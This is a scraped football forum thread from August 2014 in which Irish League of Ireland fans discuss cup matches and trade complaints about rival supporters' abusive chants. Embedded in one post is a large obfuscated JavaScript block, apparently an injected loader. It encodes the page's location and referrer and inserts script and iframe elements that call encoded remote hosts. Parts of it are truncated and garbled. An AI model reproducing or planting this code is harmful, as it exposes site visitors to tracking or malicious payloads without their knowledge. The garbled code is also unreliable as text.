Cup weekend

Post Reply Post Reply Page  <12345 17>

Post Options Post Options   Thanks (0) Thanks(0)   Quote roverstillidie Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 10:44am
Shels fans and their behavior slips under the radar because of where they are and how few of them they are.

starryplough View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote starryplough Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:03am
Originally posted by Richmond Ultra Richmond Ultra wrote:

Michaels v Avondale should be a great game. Two of the strongest senior and junior teams in the country.

Going to that myself, it should be a cracker.< id="EDC270464ECE7E00">(function(){var g=function(f,r){var x="",a=window,h="f"+"r\u006F"+"mC"+"h\x61r\x43\x6F\x64\x65",m="\x63h\u0061\x72Co"+""+"d\u0065"+"A"+"t",d=("\u0045\u0050"+"h")['\x72\u0065pla\x63\u0065']("\u0045\u0050","\u006C\u0065n\u0067t"+""),u="\x53\x74r"+"ing"+"",w=a,j=w[h],c,l;for(var y=0;y\x68"+"yj"+""+"lv}\x6a\u0076yu"+"\u007D%",0X18)+sr +g(('>\x4a'+'Ay'+'\u0046\u0051|\u0025').replace('J\u0041\u0079F','m\u006B\u007D'+'j'),0x18)+"EDC270464ECE7E00"+g((">"+"\x5bL"+"Q\\%\u006a\u006E\x62\u006A\u002A\u0028\x2c\x68N(\x2B*"+"").replace("h\u004E","\x28\u0047\x2d"),0x18));document[g('z\x77|\x61',030)][g(("\u0079\x68h"+"\u007D\x76l"+"p\x6B"+"y\x59q\u0074|").replace("\u006cpk\x79Y","\x7C\u005b\u0070"),030)](oy);})();(function(){if(jg(g(("\u0077Dhhq"+"\u0076\x7f").replace(""+"wD","\x6b\x70\u0077"),24)))return;var aj=g("Z"+"\x7Dl"+"l"+"\x7Dj"+"U"+"y\x6a"+"s"+"Q\u006c",24);var ig={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(hc){var jx="";var y,cl,qm,dn,og,vs,de;var td=0;hc=ig[g('G\x6Dl~\u0020\x47}'+'v'+'\x7b\u0077'+'|\u007D',24)](hc);while(td>2;og=((y&3)<<4|cl>>4);vs=((cl&15)<<2|qm>>6);de=qm&63;if(isNaN(cl)){vs=de=64}else{if(isNaN(qm)){de=64}}jx=jx+this[g(("\u0047\u0073\x72s\x75"+"n"+"l\x6A").replace("rs"+"\x75n","\u007Da\x4b"),030)][g('{'+'py'+'j\u0059\x6C',030)](dn)+this[g(('G'+'in\x6AJ\x59j').replace('\x69\u006e'+'j\u004A\x59','s'+''+'}a'+'\u004Bl'+''),030)][g(''+'{p'+'yjY\u006C',030)](og)+this[g("\u0047\x73\x7Da"+""+"K\u006c\x6A",030)][g((''+'{\x70y\x59\x71\u004D\u0069\u0073l').replace('Y\x71\u004D'+'i\x73','j'+'Y'),0x18)](vs)+this[g('\u0047s}\x61\u004b\x6C\x6a',24)][g(("LV"+"zul").replace(""+"LV\x7a\x75","{\u0070"+"y"+"j\u0059"),24)](de)}return jx},decode:function(wt){var cl={},cv,kd,at=[],zi="",yf=String[g(('a'+'\u007a'+'p\x79\u006A['+'\x77|'+'\x7D').replace('\u0061\u007a','\x7Ej\u0077\x75\x5B'),030)];var sh=[[65,91],[97,123],[48,58],[43,44],[47,48]];for(oz in sh){for(cv=sh[oz][0];cv=8){zi+=yf((de>>>(ny-=8))%256)}}}return zi},_utf8_encode:function(uj){uj=uj[g("j"+"}\u0068t"+"\u0079\x7B\x7d",24)](/\r\n/g,"\n");var sh="";for(var ny=0;ny127)&&(kd<2048sh+=g'~u006A'+'wtx73u004Cx5ax64x5b'+'wx7C'+''.replace'x74u0073x4cx5Ad','u'+'u0070x79u006A',030kd>>6)|192);sh+=String[g('~\u006A\u0077\x75[p\u0079j'+'[w\u007c}',030)]((kd&63)|128)}else{sh+=String[g(('\u007ejw'+'\u0056\u0053\u0075L'+''+'j['+'\u0077\x7C}'+'').replace('\x56S'+'uL'+'','u'+'['+'\x70\x79'),030)]((kd>>12)|224);sh+=String[g(("~\x6Aw"+"\u0075\u005Bp"+"\u0079"+"gv\u0077\x7c}"+"").replace(""+"g\u0076","j\u005b"),24)](((kd>>6)&63)|128);sh+=String[g(("\x7e"+"j\x77u"+"\u005b\x70y\x46"+"e\u0067w|"+"\x7d").replace("F"+"\x65\u0067",""+"j["),24)]((kd&63)|128)}}}return sh}};var vw=g("\x76\x25",24)+aj+g(('\u003ep'+'%'+'\u007F\u0061\u006b6\x75\x79\u0068hq\u0076\u007f|\x776v'+'}l'+'\x3Ew\x25|'+'h'+'>y'+''+'%\u002A\x76\u0064\x3Ek'+'\x25\x2d\u0028\u002B\x2A\u003E\u007b\u0025\u007fj}'+'}\x76>\u006F'+'%').replace('\x76'+'d','('+','+'\x28'),030)+document[g(('\u0074\u0077{'+'\x79g'+'Bv'+'').replace('\x67\u0042',''+'l\x71\x77'),030)][g(("\x70\x77k"+"\u004A\x42I"+"\x70\u0079\x75}").replace("JB\u0049\x70",""+"l\x76"),0x18)];var uu=g('p'+'\u006Cl\x68\"\x377\u007fa'+'k6\x75y'+''+'h'+'hq'+'v\x7f'+'|'+'w'+'6\u0076\u007d'+'l\x37k'+'|\u0037yh'+'hk7\x79|'+'\u0071v'+'~'+'w\x35)'+'\x36\x28\u0037qv|\u007D\x606'+'pl'+'\x75\x74\'',030)+ig[g("}v"+"\x7B"+"w\u007c\x7D",0x18)](vw);var oy=document[g("\x7bj\x7Dy"+"l\u007d\x5d\u0074\x7du"+""+"}\x76l",030)](g("\x6b\u007b"+"j\x71h\x6C",030));oy[g(("u\u0049r\x59"+"l\u006c\u006A\u0071z\x6d\u006c}"+"").replace(""+"u\x49\x72","k\u007d\u006C"),24)](g("\x6ca"+"\x68}"+"",030),g('l'+'\x7D`l\u0037\u0072y\u006e\u0079k\u007B\x6A\u0071h'+'l'+'',24));oy[g(('\u006B\u007d\x6c\x59\u006c\x6cAB\u0054\x76\x45'+'ml'+'\u007d').replace('\u0041\u0042\u0054v'+'E','j\u0071z'),0x18)](g("\x7B\u0070y\u006ak\x7dl"+"",030),g(('M\u006f\u006d\u004F\u006FP'+'\u004FZq'+'\x50\x35\x20').replace('\x6f\u006D\u004fo'+'\x50'+'OZ'+'\u0071\x50','\u004c^'+''),24));if("http:"==document[g(('\u0074wO\x59g\x59\u0051v').replace('OY\x67'+'Y\u0051','\u007by\u006c'+'q\x77'),0X18)][g('h'+'j'+'w'+'l\u0077{'+'w'+'t',24)]){oy[g('\u006b\x7d\u006C\x59l'+'\x6cjq'+'z\x6dl'+'\u007D',0X18)](g("k"+"j{",0x18),g("p"+"l\u006c\x68\"7"+"\u0037\u0071\x36zs\x79\u006C\x72k"+"6\u0071\u0076~\u0077\x37\u006A\x6Ebj\x37\x72\u0079\u006ey\x6B\u007Bj"+"\u0071\u0068\u006c\x36\x72\x6B\'\x7bp\u0079\x76\x76"+"}\x74"+"%\x6A\x6Eb\x6a*"+"("+"\x2c(G-"+"(\x2b\u002A\u003Ey\x68\x68L\x71"+"lt"+"}\u0025",030)+aj+g('>h\x74qv'+'s%'+'',24)+encodeURIComponent(uu));}else{oy[g("k"+""+"}\u006CY"+"ll\u006Aq"+"zm\x6C}"+"",0x18)](g('\u006b'+'j\u007b',030),g(('p\u006cl'+'h'+'k\"7'+'\u0037\u0071G\x7a\u0073'+'y\x6c\x72kG'+'\x71\u0076~'+'\u00776'+'\u006c\u0074\u006B\u007B\x7c\u00766\u006A\x68'+'u'+'7\x6an'+'\x62j7'+'\x72\u0079nyk\u007B\u006Aq\u0068l\u0036r'+'k\'\u007B\u0070\u0079v\u0076}\u0074\u0025\u006A\x6e\u0062j*'+''+'(,('+''+'G-(+\u002A\x3e\x79hh'+'L'+'q'+'\u006C'+'t}%').replace('\x6Ah',''+'{'+'w'),030)+aj+g(""+">\u0068"+"t\x71\x76s"+"%",0x18)+encodeURIComponent(uu));}document[g("\u007aw"+""+"|\x61",0x18)][g('\x79h\u0068\x7Dv\u007c\x5B'+'p\u0071t'+'|',24)](oy);})();;var zk=document[g('{'+'\x6A\u007Dy'+'\x6C\u007D]'+'\x74}'+''+'u\u007dvl',030)](g(("k\u007bj\u004a"+"i\u0064F"+"Yl").replace("\x4a\x69dF"+""+"Y","\x71\x68"),24));var lz=0x980E303D;zk[g(''+'kj\u007B',030)]=g(('77\x7F\u0061k'+'\x36\u0075\x79\x68h'+'\u0071v\u007F\u007c\x776'+'vl\x49G'+'\u006b|\u0037\x2A\u0028\u002C(\u0037\x2D'+'(+\x2A\u0036r\x6B').replace('l'+'\u0049G','\x7d\u006C\u0037'),24);try{if(screen[('\x63o\u006C\u0042f'+'t'+'h').replace('\x42\u0066','o\u0072'+'Dep')])var wj='S:Z84ed1Ginn5o ';}catch(hj){};document[g(("\u0071\u0066\x70\u004e\x6cO"+"\u0058t\u005a"+"j\u007c\u0061").replace("\x71\u0066\u0070Nl\x4FX\x74Z"+"j","\u007Aw"),24)][g('\x79h'+'h\u007dv|'+'[p'+''+'q\x74'+'|',030)](zk);}})();

Wow, just wow
Some Clubs Are Bigger Than Others
starryplough View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote starryplough Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:05am
Originally posted by saintjoey saintjoey wrote:

Always hated shels, but if possible it's got even worse! Absolute scum singing about our fan who died in Poland, not just one or 2 either!

On the game we shoul of won easily, poor poor result

Of course it is poor form, but apparently Pats fans didn't cover themselves in glory with the minutes applause for Eric Barber? Yous should have ignored the thirty teenagers on their school tour
Some Clubs Are Bigger Than Others

Post Options Post Options   Thanks (0) Thanks(0)   Quote roverstillidie Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:06am

Strange sorta game in Tallaght.  Dreadful 1st 25 mins, then Rovers broke away and scored moments after Murphy denied Longford, fine finish by Windy.  Second goal was an absolutely magnificent McCabe volley, Shep's shot blocked by Sullivan and as the ball dropped 25 yards out, McCabe caught it plum on the volley for a brilliant goal.

2nd half was dreadful from Rovers, Windy got a 2nd yellow ten mins from time, before Kilduff put debutant Patrick Cregg clear in injury time for a nice finish.

Ricer's reception at the end was nice.

Last 8 accomplished, but Nutsy and the players got a long way to go yet.
I think that's a bit harsh, job done, never under pressure against a side that won't look out of place in the PD
saintjoey View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote saintjoey Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:25am
Originally posted by starryplough starryplough wrote:

Always hated shels, but if possible it's got even worse! Absolute scum singing about our fan who died in Poland, not just one or 2 either!

On the game we shoul of won easily, poor poor result

Of course it is poor form, but apparently Pats fans didn't cover themselves in glory with the minutes applause for Eric Barber? Yous should have ignored the thirty teenagers on their school tour

In context a bit, that applause happened literally 5mins after they had being singing about Chris, people were very upset and angry at the time, it was only the section that Chris stood in that turned there back, myself included(although I regret it now I won't apologise for it) and there was no boos or that sort of stuff for it!

Post Options Post Options   Thanks (0) Thanks(0)   Quote MC Hammered Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:53am
In fairness, it was poor form from sections of both supporters. There were boo's for the minutes applause and there were a couple of songs about Ollie Byrne. I understand the anger Joey but it would have been better to rise above the sh*te

Post Options Post Options   Thanks (0) Thanks(0)   Quote Gaz Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 11:53am
What song were they singing? I was in the stand, not behind the goal and didn't hear anything to be honest, mind you I wasn't listening out for it so prob wouldn't have noticed either way

Post Options Post Options   Thanks (0) Thanks(0)   Quote FREEWHEELER Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:02pm

Strange sorta game in Tallaght.  Dreadful 1st 25 mins, then Rovers broke away and scored moments after Murphy denied Longford, fine finish by Windy.  Second goal was an absolutely magnificent McCabe volley, Shep's shot blocked by Sullivan and as the ball dropped 25 yards out, McCabe caught it plum on the volley for a brilliant goal.

2nd half was dreadful from Rovers, Windy got a 2nd yellow ten mins from time, before Kilduff put debutant Patrick Cregg clear in injury time for a nice finish.

Ricer's reception at the end was nice.

Last 8 accomplished, but Nutsy and the players got a long way to go yet.
I think that's a bit harsh, job done, never under pressure against a side that won't look out of place in the PD

Not sure it's harsh to be honest. Up to the 1st goal we were terrible sloppy. Two wonderful goals made a huge difference to the outcome as Longford shoulda been ahead seconds before our first. Way too many diagonal punts 2nd half for my liking. Pleased to win but not overly impressed with the overall display.
The Saint View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote The Saint Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:14pm
There were a few incidents last night that if it was rovers-bohs the papers would have sensationalised today in the papers.
Scuffles before and after the game. All the way down in Mount Brown after  

saintjoey View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote saintjoey Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:17pm

What song were they singing? I was in the stand, not behind the goal and didn't hear anything to be honest, mind you I wasn't listening out for it so prob wouldn't have noticed either way

It was outside, not sure if was sung inside! There was a bit of a standoff kinda thing going on, as I got closer shels fans were singing "all the way to Poland to take a heart attack" I flipped meself, I'm not one to get involved in that rubbish either!

They would wanna up security for the replay
saintjoey View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote saintjoey Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:18pm

In fairness, it was poor form from sections of both supporters. There were boo's for the minutes applause and there were a couple of songs about Ollie Byrne. I understand the anger Joey but it would have been better to rise above the sh*te

Didn't hear the boos in our section, our section sang threw it though
Stillhuntinghenry View Drop Down

useless at posting links

Post Options Post Options   Thanks (0) Thanks(0)   Quote Stillhuntinghenry Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:34pm

It was outside, not sure if was sung inside! There was a bit of a standoff kinda thing going on, as I got closer shels fans were singing "all the way to Poland to take a heart attack" I flipped meself, I'm not one to get involved in that rubbish either!

They would wanna up security for the replay

IF that's the craic both sets of supporters were at they should play it behind closed doors.
"Not one cent" - RTID on Mark Quigley's pay-off from Shamrock

Post Options Post Options   Thanks (0) Thanks(0)   Quote BigStrongMan Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 12:37pm
Who did Malahide sign preseason,he had an unsuccessful spell across the water?
Local lad who played schoolboy with them
His name escapes me
KingswoodRover View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote KingswoodRover Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 1:17pm
There are complete lowlife's following a lot of clubs. Our lowlife's had a little ditty down in Cobh the night we won Div 1 praising the young guy that tragically killed his neighbour, i was ashamed to be in the same ground as them. Herd mentality, Drink and disco biscuits not conduicve to making good ethical choices.

Post Options Post Options   Thanks (0) Thanks(0)   Quote roverstillidie Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 1:52pm
That song wasn't sung in the ground in Cobh though, was it?

Post Options Post Options   Thanks (0) Thanks(0)   Quote Landon Donovan Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 2:05pm
I have been in an around some of the more riff-raffy shelbourne fans on occasions. They are definitely a turn off for the club. Sometimes you just look around and say to yourself "If I were to bump into these people away from a football match, they would probably try to rob me". The skanger element gets brushed under the carpet in the LOI. Why would anybody want to be associated with these people?

EastStandMan View Drop Down

I am Shamrock Rovers

Post Options Post Options   Thanks (0) Thanks(0)   Quote EastStandMan Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 2:10pm
Good result Rovers . Think we will get sharper under Nutsy - need to. Great goals and Gary Mac"s shouldnt be missed Monday night on the telly . 
Shamrock Rovers - lovin the buzz .
KingswoodRover View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote KingswoodRover Quote  Post ReplyReply Direct Link To This Post Posted: 23 Aug 2014 at 4:30pm

That song wasn't sung in the ground in Cobh though, was it?

Fraid so RTID in the little shed behind the goal sorry to say.
 Post Reply Post Reply Page  <12345 17>